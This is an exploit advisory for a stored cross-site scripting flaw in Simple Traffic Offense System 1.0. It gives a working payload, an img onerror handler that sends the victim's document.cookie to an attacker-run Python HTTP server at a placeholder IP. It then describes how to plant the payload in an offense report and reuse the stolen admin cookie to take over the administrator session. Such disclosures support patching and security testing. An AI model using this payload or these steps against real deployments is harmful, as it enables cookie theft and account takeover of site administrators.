Simple Traffic Offense System 1.0 Cross Site Scripting

Simple Traffic Offense System version 1.0 suffers from a persistent cross site scripting vulnerability.


MD5 | c0765890ba077d7218f2533e8198df78

# Exploit Title: Traffic Offense System | Stored Cross Site Scripting (Cookie-theft)
# Exploit Author: Richard Jones
# Date: 03-04-2021
# Vendor Homepage: https://www.sourcecodester.com/
# Software Link: https://www.sourcecodester.com/php/12330/simple-traffic-offense-system-php.html
# Version: 1.0
# Tested On: Windows 10 Home 19041 (x64_86) + XAMPP 7.2.34


Stored XSS by adding a offense report.

Steps
1. Using an officer account, login to the application.
2. Start a python server (python3 -m http.server 8090)
3. Goto Report Offense, make a report, add payload below in the name or address field

Payload:

"><img src=x onerror="this.src='http://YOUR-IP:8090/?'+document.cookie; this.removeAttribute('onerror');">

4. Wait for the admin to login.
5. Cookies will show in the python server
6. Get admin access here: http://TARGET/trafic/index.php , open dev tools (f12), add cookie to session and refresh page to be logged in as admin.

Related Posts